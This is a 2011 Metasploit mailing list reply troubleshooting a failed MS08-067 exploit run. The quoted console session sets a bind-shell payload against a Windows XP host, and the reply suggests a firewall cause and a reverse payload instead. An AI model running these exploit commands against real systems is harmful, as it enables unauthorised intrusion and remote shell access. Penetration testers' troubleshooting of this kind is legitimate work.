Metasploit mailing list archives

Re: ASK: Exploit completed, but no session was created

From: Jose Selvi <jselvi () pentester es>
Date: Sat, 12 Mar 2011 20:52:56 +0100

Target isn't vulnerable or you can't establish a connection.
Maybe the XP firewall is blocking incoming connections to 4444/tcp.

Why don't you try to use another payload? a reverse one.

If it's a test machine you can also try to look if there ir anylistening process at 4444/tcp with netstat. If not, probably targetisn't vulnerable.


Good luck.
Regards.

El 12/03/11 15:21, Dodi Ara escribió:

msf>  use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi)>  set payload windows/shell_bind_tcp
payload =>  windows/shell_bind_tcp
msf exploit(ms08_067_netapi)>  set RHOST 192.168.1.1
RHOST =>  192.168.1.11
msf exploit(ms08_067_netapi)>  show options

Module options (exploit/windows/smb/ms08_067_netapi):

    Name     Current Setting  Required  Description
    ----     ---------------  --------  -----------
    RHOST    192.168.1.11     yes       The target address
    RPORT    445              yes       Set the SMB service port
    SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/shell_bind_tcp):

    Name      Current Setting  Required  Description
    ----      ---------------  --------  -----------
    EXITFUNC  thread           yes       Exit technique: seh, thread,
none, process
    LPORT     4444             yes       The listen port
    RHOST     192.168.1.11     no        The target address


Exploit target:

    Id  Name
    --  ----
    0   Automatic Targeting


msf exploit(ms08_067_netapi)>  exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi)>

-------------------------
why metasploit doesn't succesfuly?
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework


--
Jose Selvi.
Security Technical Consultant
CISA, CISSP, CNAP, GCIH, GPEN

http://www.pentester.es

SANS Mentor in Madrid (Spain). September 23 - November 25
SEC560: Network Penetration Testing and Ethical Hacking
http://www.sans.org/mentor/details.php?nid=24133
http://www.pentester.es/2010/12/nuevo-grupo-y-descuento-para-network.html
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

Current thread:

ASK: Exploit completed, but no session was created Dodi Ara (Mar 12)
- Re: ASK: Exploit completed, but no session was created Sumit Sharma (Mar 12)
- Re: ASK: Exploit completed, but no session was created Jose Selvi (Mar 12)